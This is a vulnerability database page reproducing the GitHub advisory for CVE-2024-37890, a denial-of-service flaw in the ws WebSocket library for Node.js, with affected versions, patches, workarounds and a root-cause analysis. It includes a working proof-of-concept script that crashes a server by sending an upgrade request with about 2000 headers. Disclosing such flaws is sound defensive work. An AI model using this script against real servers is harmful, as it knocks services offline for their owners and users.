7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-37890

GHSA ID

GHSA-3h5v-q93c-6h6q

EPSS Score

0.54504%

CWE

CWE-476

Published

6/17/2024

Updated

8/5/2024

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-37890

CVE-2024-37890: ws affected by a DoS when handling a request with many HTTP headers

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

(GitHub Advisory)

7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-37890

GHSA ID

GHSA-3h5v-q93c-6h6q

EPSS Score

0.54504%

CWE

CWE-476

Published

6/17/2024

Updated

8/5/2024

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
ws	npm	>= 2.1.0, < 5.2.4	5.2.4
ws	npm	>= 6.0.0, < 6.2.3	6.2.3
ws	npm	>= 7.0.0, < 7.5.10	7.5.10
ws	npm	>= 8.0.0, < 8.17.1	8.17.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability occurs because the code attempts to access properties (like .toLowerCase()) of header values (specifically Upgrade and Sec-WebSocket-Key) without first checking if these headers exist in the req.headers (for server) or res.headers (for client) object. Node.js's HTTP parser may omit headers from this object if the maxHeadersCount limit is exceeded. The patches consistently add checks for undefined before accessing these properties. The primary vulnerable function, as per the advisory and PoC, is WebSocketServer.handleUpgrade which processes incoming requests on the server. The initAsClient function in lib/websocket.js was also patched for an analogous issue on the client side when processing response headers. Both functions are directly involved in parsing headers critical for WebSocket establishment and were modified to prevent crashes when these headers are missing due to header count limits.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Imp**t * r*qu*st wit* * num**r o* *****rs *x****in* t**[`s*rv*r.m*x*****rs*ount`][] t*r*s*ol* *oul* ** us** to *r*s* * ws s*rv*r. ### Proo* o* *on**pt ```js *onst *ttp = r*quir*('*ttp'); *onst W**So*k*t = r*quir*('ws'); *onst wss = n*w W**So*

Reasoning

T** vuln*r**ility o**urs ****us* t** *o** *tt*mpts to ****ss prop*rti*s (lik* `.toLow*r**s*()`) o* *****r v*lu*s (sp**i*i**lly `Up*r***` *n* `S**-W**So*k*t-K*y`) wit*out *irst ****kin* i* t**s* *****rs *xist in t** `r*q.*****rs` (*or s*rv*r) or `r*s.

7.5

Basic Information

Concerned about an active attack path?

CVE-2024-37890: ws affected by a DoS when handling a request with many HTTP headers

Impact

Proof of concept

Patches

Workarounds

Credits

References

7.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI